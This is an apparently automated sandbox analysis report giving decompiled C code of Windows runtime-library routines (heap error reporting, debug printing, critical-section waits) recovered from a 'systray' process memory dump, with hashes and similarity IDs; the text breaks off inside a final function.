                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                            • API String ID: 0-2897834094
                                            • Opcode ID: 36a456dd0b0005373a66f43bdf21c2a768d66ee460223fbe480e66042293def4
                                            • Instruction ID: b5fb8001a63ec778d15130e95bbaa80269ddd6083c93f6f2bfb187ec31267674
                                            • Opcode Fuzzy Hash: 36a456dd0b0005373a66f43bdf21c2a768d66ee460223fbe480e66042293def4
                                            • Instruction Fuzzy Hash: A961B572A51155EFE711A744E445B6473F4FB06A30F09442EF80AAB331FA68BD41FE0A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E045BB944(signed int* __ecx, char __edx) {
                                            				signed int _v8;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				char _v28;
                                            				signed int _v32;
                                            				char _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				signed int* _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				intOrPtr _v60;
                                            				intOrPtr _v64;
                                            				intOrPtr _v68;
                                            				intOrPtr _v72;
                                            				intOrPtr _v76;
                                            				char _v77;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t65;
                                            				intOrPtr _t67;
                                            				intOrPtr _t68;
                                            				char* _t73;
                                            				intOrPtr _t77;
                                            				intOrPtr _t78;
                                            				signed int _t82;
                                            				intOrPtr _t83;
                                            				void* _t87;
                                            				char _t88;
                                            				intOrPtr* _t89;
                                            				intOrPtr _t91;
                                            				void* _t97;
                                            				intOrPtr _t100;
                                            				void* _t102;
                                            				void* _t107;
                                            				signed int _t108;
                                            				intOrPtr* _t112;
                                            				void* _t113;
                                            				intOrPtr* _t114;
                                            				intOrPtr _t115;
                                            				intOrPtr _t116;
                                            				intOrPtr _t117;
                                            				signed int _t118;
                                            				void* _t130;
                                            
                                            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                            				_v8 =  *0x468d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                            				_t112 = __ecx;
                                            				_v77 = __edx;
                                            				_v48 = __ecx;
                                            				_v28 = 0;
                                            				_t5 = _t112 + 0xc; // 0x575651ff
                                            				_t105 =  *_t5;
                                            				_v20 = 0;
                                            				_v16 = 0;
                                            				if(_t105 == 0) {
                                            					_t50 = _t112 + 4; // 0x5de58b5b
                                            					_t60 =  *__ecx |  *_t50;
                                            					if(( *__ecx |  *_t50) != 0) {
                                            						 *__ecx = 0;
                                            						__ecx[1] = 0;
                                            						if(E045B7D50() != 0) {
                                            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t65 = 0x7ffe0386;
                                            						}
                                            						if( *_t65 != 0) {
                                            							E04668CD6(_t112);
                                            						}
                                            						_push(0);
                                            						_t52 = _t112 + 0x10; // 0x778df98b
                                            						_push( *_t52);
                                            						_t60 = E045D9E20();
                                            					}
                                            					L20:
                                            					_pop(_t107);
                                            					_pop(_t113);
                                            					_pop(_t87);
                                            					return E045DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                            				}
                                            				_t8 = _t112 + 8; // 0x8b000cc2
                                            				_t67 =  *_t8;
                                            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                            				_t108 =  *(_t67 + 0x14);
                                            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                            				_t105 = 0x2710;
                                            				asm("sbb eax, edi");
                                            				_v44 = _t88;
                                            				_v52 = _t108;
                                            				_t60 = E045DCE00(_t97, _t68, 0x2710, 0);
                                            				_v56 = _t60;
                                            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                            					L3:
                                            					 *(_t112 + 0x44) = _t60;
                                            					_t105 = _t60 * 0x2710 >> 0x20;
                                            					 *_t112 = _t88;
                                            					 *(_t112 + 4) = _t108;
                                            					_v20 = _t60 * 0x2710;
                                            					_v16 = _t60 * 0x2710 >> 0x20;
                                            					if(_v77 != 0) {
                                            						L16:
                                            						_v36 = _t88;
                                            						_v32 = _t108;
                                            						if(E045B7D50() != 0) {
                                            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t73 = 0x7ffe0386;
                                            						}
                                            						if( *_t73 != 0) {
                                            							_t105 = _v40;
                                            							E04668F6A(_t112, _v40, _t88, _t108);
                                            						}
                                            						_push( &_v28);
                                            						_push(0);
                                            						_push( &_v36);
                                            						_t48 = _t112 + 0x10; // 0x778df98b
                                            						_push( *_t48);
                                            						_t60 = E045DAF60();
                                            						goto L20;
                                            					} else {
                                            						_t89 = 0x7ffe03b0;
                                            						do {
                                            							_t114 = 0x7ffe0010;
                                            							do {
                                            								_t77 =  *0x4688628; // 0x0
                                            								_v68 = _t77;
                                            								_t78 =  *0x468862c; // 0x0
                                            								_v64 = _t78;
                                            								_v72 =  *_t89;
                                            								_v76 =  *((intOrPtr*)(_t89 + 4));
                                            								while(1) {
                                            									_t105 =  *0x7ffe000c;
                                            									_t100 =  *0x7ffe0008;
                                            									if(_t105 ==  *_t114) {
                                            										goto L8;
                                            									}
                                            									asm("pause");
                                            								}
                                            								L8:
                                            								_t89 = 0x7ffe03b0;
                                            								_t115 =  *0x7ffe03b0;
                                            								_t82 =  *0x7FFE03B4;
                                            								_v60 = _t115;
                                            								_t114 = 0x7ffe0010;
                                            								_v56 = _t82;
                                            							} while (_v72 != _t115 || _v76 != _t82);
                                            							_t83 =  *0x4688628; // 0x0
                                            							_t116 =  *0x468862c; // 0x0
                                            							_v76 = _t116;
                                            							_t117 = _v68;
                                            						} while (_t117 != _t83 || _v64 != _v76);
                                            						asm("sbb edx, [esp+0x24]");
                                            						_t102 = _t100 - _v60 - _t117;
                                            						_t112 = _v48;
                                            						_t91 = _v44;
                                            						asm("sbb edx, eax");
                                            						_t130 = _t105 - _v52;
                                            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                            							_t88 = _t102 - _t91;
                                            							asm("sbb edx, edi");
                                            							_t108 = _t105;
                                            						} else {
                                            							_t88 = 0;
                                            							_t108 = 0;
                                            						}
                                            						goto L16;
                                            					}
                                            				} else {
                                            					if( *(_t112 + 0x44) == _t60) {
                                            						goto L20;
                                            					}
                                            					goto L3;
                                            				}
                                            			}

















































                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045BB9A5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 885266447-0
                                            • Opcode ID: 65b56f443506f9f606c3f0d0cf52be988f87eaa358d36617a7fa2a58edc60622
                                            • Instruction ID: cb01e2cd89c0d5d03167cb64fc344cb0766deb8a9a69534b67e895e1facec09b
                                            • Opcode Fuzzy Hash: 65b56f443506f9f606c3f0d0cf52be988f87eaa358d36617a7fa2a58edc60622
                                            • Instruction Fuzzy Hash: 215155B1A08301DFC724DF28C48092ABBE5FB88644F64896EE9C587744E7B1F844DB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E0459B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                            				signed int _t65;
                                            				signed short _t69;
                                            				intOrPtr _t70;
                                            				signed short _t85;
                                            				void* _t86;
                                            				signed short _t89;
                                            				signed short _t91;
                                            				intOrPtr _t92;
                                            				intOrPtr _t97;
                                            				intOrPtr* _t98;
                                            				signed short _t99;
                                            				signed short _t101;
                                            				void* _t102;
                                            				char* _t103;
                                            				signed short _t104;
                                            				intOrPtr* _t110;
                                            				void* _t111;
                                            				void* _t114;
                                            				intOrPtr* _t115;
                                            
                                            				_t109 = __esi;
                                            				_t108 = __edi;
                                            				_t106 = __edx;
                                            				_t95 = __ebx;
                                            				_push(0x90);
                                            				_push(0x466f7a8);
                                            				E045ED0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                            				if(__edx == 0xffffffff) {
                                            					L6:
                                            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                            					__eflags = _t65 & 0x00000002;
                                            					if((_t65 & 0x00000002) != 0) {
                                            						L3:
                                            						L4:
                                            						return E045ED130(_t95, _t108, _t109);
                                            					}
                                            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                            					_t108 = 0;
                                            					_t109 = 0;
                                            					_t95 = 0;
                                            					__eflags = 0;
                                            					while(1) {
                                            						__eflags = _t95 - 0x200;
                                            						if(_t95 >= 0x200) {
                                            							break;
                                            						}
                                            						E045DD000(0x80);
                                            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                            						_t108 = _t115;
                                            						_t95 = _t95 - 0xffffff80;
                                            						_t17 = _t114 - 4;
                                            						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                            						__eflags =  *_t17;
                                            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                            						_t102 = _t110 + 1;
                                            						do {
                                            							_t85 =  *_t110;
                                            							_t110 = _t110 + 1;
                                            							__eflags = _t85;
                                            						} while (_t85 != 0);
                                            						_t111 = _t110 - _t102;
                                            						_t21 = _t95 - 1; // -129
                                            						_t86 = _t21;
                                            						__eflags = _t111 - _t86;
                                            						if(_t111 > _t86) {
                                            							_t111 = _t86;
                                            						}
                                            						E045DF3E0(_t108, _t106, _t111);
                                            						_t115 = _t115 + 0xc;
                                            						_t103 = _t111 + _t108;
                                            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                            						_t89 = _t95 - _t111;
                                            						__eflags = _t89;
                                            						_push(0);
                                            						if(_t89 == 0) {
                                            							L15:
                                            							_t109 = 0xc000000d;
                                            							goto L16;
                                            						} else {
                                            							__eflags = _t89 - 0x7fffffff;
                                            							if(_t89 <= 0x7fffffff) {
                                            								L16:
                                            								 *(_t114 - 0x94) = _t109;
                                            								__eflags = _t109;
                                            								if(_t109 < 0) {
                                            									__eflags = _t89;
                                            									if(_t89 != 0) {
                                            										 *_t103 = 0;
                                            									}
                                            									L26:
                                            									 *(_t114 - 0xa0) = _t109;
                                            									 *(_t114 - 4) = 0xfffffffe;
                                            									__eflags = _t109;
                                            									if(_t109 >= 0) {
                                            										L31:
                                            										_t98 = _t108;
                                            										_t39 = _t98 + 1; // 0x1
                                            										_t106 = _t39;
                                            										do {
                                            											_t69 =  *_t98;
                                            											_t98 = _t98 + 1;
                                            											__eflags = _t69;
                                            										} while (_t69 != 0);
                                            										_t99 = _t98 - _t106;
                                            										__eflags = _t99;
                                            										L34:
                                            										_t70 =  *[fs:0x30];
                                            										__eflags =  *((char*)(_t70 + 2));
                                            										if( *((char*)(_t70 + 2)) != 0) {
                                            											L40:
                                            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                            											 *(_t114 - 4) = 1;
                                            											_push(_t114 - 0x74);
                                            											L045EDEF0(_t99, _t106);
                                            											 *(_t114 - 4) = 0xfffffffe;
                                            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                            											goto L3;
                                            										}
                                            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                            											goto L40;
                                            										}
                                            										_push( *((intOrPtr*)(_t114 + 8)));
                                            										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                            										_push(_t99 & 0x0000ffff);
                                            										_push(_t108);
                                            										_push(1);
                                            										_t101 = E045DB280();
                                            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                            										if( *((char*)(_t114 + 0x14)) == 1) {
                                            											__eflags = _t101 - 0x80000003;
                                            											if(_t101 == 0x80000003) {
                                            												E045DB7E0(1);
                                            												_t101 = 0;
                                            												__eflags = 0;
                                            											}
                                            										}
                                            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                            										goto L4;
                                            									}
                                            									__eflags = _t109 - 0x80000005;
                                            									if(_t109 == 0x80000005) {
                                            										continue;
                                            									}
                                            									break;
                                            								}
                                            								 *(_t114 - 0x90) = 0;
                                            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                            								_t91 = E045DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                            								_t115 = _t115 + 0x10;
                                            								_t104 = _t91;
                                            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                            								__eflags = _t104;
                                            								if(_t104 < 0) {
                                            									L21:
                                            									_t109 = 0x80000005;
                                            									 *(_t114 - 0x90) = 0x80000005;
                                            									L22:
                                            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                            									L23:
                                            									 *(_t114 - 0x94) = _t109;
                                            									goto L26;
                                            								}
                                            								__eflags = _t104 - _t92;
                                            								if(__eflags > 0) {
                                            									goto L21;
                                            								}
                                            								if(__eflags == 0) {
                                            									goto L22;
                                            								}
                                            								goto L23;
                                            							}
                                            							goto L15;
                                            						}
                                            					}
                                            					__eflags = _t109;
                                            					if(_t109 >= 0) {
                                            						goto L31;
                                            					}
                                            					__eflags = _t109 - 0x80000005;
                                            					if(_t109 != 0x80000005) {
                                            						goto L31;
                                            					}
                                            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                            					_t38 = _t95 - 1; // -129
                                            					_t99 = _t38;
                                            					goto L34;
                                            				}
                                            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                            					__eflags = __edx - 0x65;
                                            					if(__edx != 0x65) {
                                            						goto L2;
                                            					}
                                            					goto L6;
                                            				}
                                            				L2:
                                            				_push( *((intOrPtr*)(_t114 + 8)));
                                            				_push(_t106);
                                            				if(E045DA890() != 0) {
                                            					goto L6;
                                            				}
                                            				goto L3;
                                            			}























                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID: _vswprintf_s
                                            • String ID:
                                            • API String ID: 677850445-0
                                            • Opcode ID: 761eaa09e4b0f0a216a682a54a8d2cc1a427e74e45422a6810c3b34f0afa9a9c
                                            • Instruction ID: 876b5226aacb47c7a1e29aa672802239090495815a4499959c241d6d5976e03a
                                            • Opcode Fuzzy Hash: 761eaa09e4b0f0a216a682a54a8d2cc1a427e74e45422a6810c3b34f0afa9a9c
                                            • Instruction Fuzzy Hash: 3851F171E0025A8EEF34CF68D944BBEBBB0BF52314F1041ADD959AB281D7306941AB82
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 63%
                                            			E04592D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                            				signed char _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				signed int _v52;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr _t55;
                                            				signed int _t57;
                                            				signed int _t58;
                                            				char* _t62;
                                            				signed char* _t63;
                                            				signed char* _t64;
                                            				signed int _t67;
                                            				signed int _t72;
                                            				signed int _t77;
                                            				signed int _t78;
                                            				signed int _t88;
                                            				intOrPtr _t89;
                                            				signed char _t93;
                                            				signed int _t97;
                                            				signed int _t98;
                                            				signed int _t102;
                                            				signed int _t103;
                                            				intOrPtr _t104;
                                            				signed int _t105;
                                            				signed int _t106;
                                            				signed char _t109;
                                            				signed int _t111;
                                            				void* _t116;
                                            
                                            				_t102 = __edi;
                                            				_t97 = __edx;
                                            				_v12 = _v12 & 0x00000000;
                                            				_t55 =  *[fs:0x18];
                                            				_t109 = __ecx;
                                            				_v8 = __edx;
                                            				_t86 = 0;
                                            				_v32 = _t55;
                                            				_v24 = 0;
                                            				_push(__edi);
                                            				if(__ecx == 0x4685350) {
                                            					_t86 = 1;
                                            					_v24 = 1;
                                            					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                            				}
                                            				_t103 = _t102 | 0xffffffff;
                                            				if( *0x4687bc8 != 0) {
                                            					_push(0xc000004b);
                                            					_push(_t103);
                                            					E045D97C0();
                                            				}
                                            				if( *0x46879c4 != 0) {
                                            					_t57 = 0;
                                            				} else {
                                            					_t57 = 0x46879c8;
                                            				}
                                            				_v16 = _t57;
                                            				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                            					_t93 = _t109;
                                            					L23();
                                            				}
                                            				_t58 =  *_t109;
                                            				if(_t58 == _t103) {
                                            					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                            					_t58 = _t103;
                                            					if(__eflags == 0) {
                                            						_t93 = _t109;
                                            						E045C1624(_t86, __eflags);
                                            						_t58 =  *_t109;
                                            					}
                                            				}
                                            				_v20 = _v20 & 0x00000000;
                                            				if(_t58 != _t103) {
                                            					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                            				}
                                            				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                            				_t88 = _v16;
                                            				_v28 = _t104;
                                            				L9:
                                            				while(1) {
                                            					if(E045B7D50() != 0) {
                                            						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                            					} else {
                                            						_t62 = 0x7ffe0382;
                                            					}
                                            					if( *_t62 != 0) {
                                            						_t63 =  *[fs:0x30];
                                            						__eflags = _t63[0x240] & 0x00000002;
                                            						if((_t63[0x240] & 0x00000002) != 0) {
                                            							_t93 = _t109;
                                            							E0462FE87(_t93);
                                            						}
                                            					}
                                            					if(_t104 != 0xffffffff) {
                                            						_push(_t88);
                                            						_push(0);
                                            						_push(_t104);
                                            						_t64 = E045D9520();
                                            						goto L15;
                                            					} else {
                                            						while(1) {
                                            							_t97 =  &_v8;
                                            							_t64 = E045CE18B(_t109 + 4, _t97, 4, _t88, 0);
                                            							if(_t64 == 0x102) {
                                            								break;
                                            							}
                                            							_t93 =  *(_t109 + 4);
                                            							_v8 = _t93;
                                            							if((_t93 & 0x00000002) != 0) {
                                            								continue;
                                            							}
                                            							L15:
                                            							if(_t64 == 0x102) {
                                            								break;
                                            							}
                                            							_t89 = _v24;
                                            							if(_t64 < 0) {
                                            								L045EDF30(_t93, _t97, _t64);
                                            								_push(_t93);
                                            								_t98 = _t97 | 0xffffffff;
                                            								__eflags =  *0x4686901;
                                            								_push(_t109);
                                            								_v52 = _t98;
                                            								if( *0x4686901 != 0) {
                                            									_push(0);
                                            									_push(1);
                                            									_push(0);
                                            									_push(0x100003);
                                            									_push( &_v12);
                                            									_t72 = E045D9980();
                                            									__eflags = _t72;
                                            									if(_t72 < 0) {
                                            										_v12 = _t98 | 0xffffffff;
                                            									}
                                            								}
                                            								asm("lock cmpxchg [ecx], edx");
                                            								_t111 = 0;
                                            								__eflags = 0;
                                            								if(0 != 0) {
                                            									__eflags = _v12 - 0xffffffff;
                                            									if(_v12 != 0xffffffff) {
                                            										_push(_v12);
                                            										E045D95D0();
                                            									}
                                            								} else {
                                            									_t111 = _v12;
                                            								}
                                            								return _t111;
                                            							} else {
                                            								if(_t89 != 0) {
                                            									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                            									_t77 = E045B7D50();
                                            									__eflags = _t77;
                                            									if(_t77 == 0) {
                                            										_t64 = 0x7ffe0384;
                                            									} else {
                                            										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                            									}
                                            									__eflags =  *_t64;
                                            									if( *_t64 != 0) {
                                            										_t64 =  *[fs:0x30];
                                            										__eflags = _t64[0x240] & 0x00000004;
                                            										if((_t64[0x240] & 0x00000004) != 0) {
                                            											_t78 = E045B7D50();
                                            											__eflags = _t78;
                                            											if(_t78 == 0) {
                                            												_t64 = 0x7ffe0385;
                                            											} else {
                                            												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                            											}
                                            											__eflags =  *_t64 & 0x00000020;
                                            											if(( *_t64 & 0x00000020) != 0) {
                                            												_t64 = E04617016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                            											}
                                            										}
                                            									}
                                            								}
                                            								return _t64;
                                            							}
                                            						}
                                            						_t97 = _t88;
                                            						_t93 = _t109;
                                            						E0462FDDA(_t97, _v12);
                                            						_t105 =  *_t109;
                                            						_t67 = _v12 + 1;
                                            						_v12 = _t67;
                                            						__eflags = _t105 - 0xffffffff;
                                            						if(_t105 == 0xffffffff) {
                                            							_t106 = 0;
                                            							__eflags = 0;
                                            						} else {
                                            							_t106 =  *(_t105 + 0x14);
                                            						}
                                            						__eflags = _t67 - 2;
                                            						if(_t67 > 2) {
                                            							__eflags = _t109 - 0x4685350;
                                            							if(_t109 != 0x4685350) {
                                            								__eflags = _t106 - _v20;
                                            								if(__eflags == 0) {
                                            									_t93 = _t109;
                                            									E0462FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                            								}
                                            							}
                                            						}
                                            						_push("RTL: Re-Waiting\n");
                                            						_push(0);
                                            						_push(0x65);
                                            						_v20 = _t106;
                                            						E04625720();
                                            						_t104 = _v28;
                                            						_t116 = _t116 + 0xc;
                                            						continue;
                                            					}
                                            				}
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Re-Waiting
                                            • API String ID: 0-316354757
                                            • Opcode ID: 828827844de736da32bf0fc22c3196211fa95093e761d570279130203c47d7ae
                                            • Instruction ID: 33487aac9c35ec2620d4fc71f37833631efb430e431d85b312ed8b220d7f3fc1
                                            • Opcode Fuzzy Hash: 828827844de736da32bf0fc22c3196211fa95093e761d570279130203c47d7ae
                                            • Instruction Fuzzy Hash: E261F471A00605BFEB25DF69D880B7A77E5FB84318F180A99E4519B2C0EB34BD01B781
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E04660EA5(void* __ecx, void* __edx) {
                                            				signed int _v20;
                                            				char _v24;
                                            				intOrPtr _v28;
                                            				unsigned int _v32;
                                            				signed int _v36;
                                            				intOrPtr _v40;
                                            				char _v44;
                                            				intOrPtr _v64;
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed int _t58;
                                            				unsigned int _t60;
                                            				intOrPtr _t62;
                                            				char* _t67;
                                            				char* _t69;
                                            				void* _t80;
                                            				void* _t83;
                                            				intOrPtr _t93;
                                            				intOrPtr _t115;
                                            				char _t117;
                                            				void* _t120;
                                            
                                            				_t83 = __edx;
                                            				_t117 = 0;
                                            				_t120 = __ecx;
                                            				_v44 = 0;
                                            				if(E0465FF69(__ecx,  &_v44,  &_v32) < 0) {
                                            					L24:
                                            					_t109 = _v44;
                                            					if(_v44 != 0) {
                                            						E04661074(_t83, _t120, _t109, _t117, _t117);
                                            					}
                                            					L26:
                                            					return _t117;
                                            				}
                                            				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                            				_t5 = _t83 + 1; // 0x1
                                            				_v36 = _t5 << 0xc;
                                            				_v40 = _t93;
                                            				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                            				asm("sbb ebx, ebx");
                                            				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                            				if(_t58 != 0) {
                                            					_push(0);
                                            					_push(0x14);
                                            					_push( &_v24);
                                            					_push(3);
                                            					_push(_t93);
                                            					_push(0xffffffff);
                                            					_t80 = E045D9730();
                                            					_t115 = _v64;
                                            					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                            						_push(_t93);
                                            						E0465A80D(_t115, 1, _v20, _t117);
                                            						_t83 = 4;
                                            					}
                                            				}
                                            				if(E0465A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                            					goto L24;
                                            				}
                                            				_t60 = _v32;
                                            				_t97 = (_t60 != 0x100000) + 1;
                                            				_t83 = (_v44 -  *0x4688b04 >> 0x14) + (_v44 -  *0x4688b04 >> 0x14);
                                            				_v28 = (_t60 != 0x100000) + 1;
                                            				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                            				_v40 = _t62;
                                            				if(_t83 >= _t62) {
                                            					L10:
                                            					asm("lock xadd [eax], ecx");
                                            					asm("lock xadd [eax], ecx");
                                            					if(E045B7D50() == 0) {
                                            						_t67 = 0x7ffe0380;
                                            					} else {
                                            						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            					}
                                            					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                            						E0465138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                            					}
                                            					if(E045B7D50() == 0) {
                                            						_t69 = 0x7ffe0388;
                                            					} else {
                                            						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            					}
                                            					if( *_t69 != 0) {
                                            						E0464FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                            					}
                                            					if(( *0x4688724 & 0x00000008) != 0) {
                                            						E046552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                            					}
                                            					_t117 = _v44;
                                            					goto L26;
                                            				}
                                            				while(E046615B5(0x4688ae4, _t83, _t97, _t97) >= 0) {
                                            					_t97 = _v28;
                                            					_t83 = _t83 + 2;
                                            					if(_t83 < _v40) {
                                            						continue;
                                            					}
                                            					goto L10;
                                            				}
                                            				goto L24;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `
                                            • API String ID: 0-2679148245
                                            • Opcode ID: c3035da543dbd532bdb213592d9d4c996a7948b257eb032fc6a728b27f525def
                                            • Instruction ID: 1dcd74df8d3670e46e7b88b7fe1a1bef7b9c9801dfdc8862caf9fcf58ab22c88
                                            • Opcode Fuzzy Hash: c3035da543dbd532bdb213592d9d4c996a7948b257eb032fc6a728b27f525def
                                            • Instruction Fuzzy Hash: E651B0712043829FE724DF29D984B5BB7E5EBC5704F044A2DF99697290EB70F805C762
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E045CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				char* _v20;
                                            				intOrPtr _v24;
                                            				char _v28;
                                            				intOrPtr _v32;
                                            				char _v36;
                                            				char _v44;
                                            				char _v52;
                                            				intOrPtr _v56;
                                            				char _v60;
                                            				intOrPtr _v72;
                                            				void* _t51;
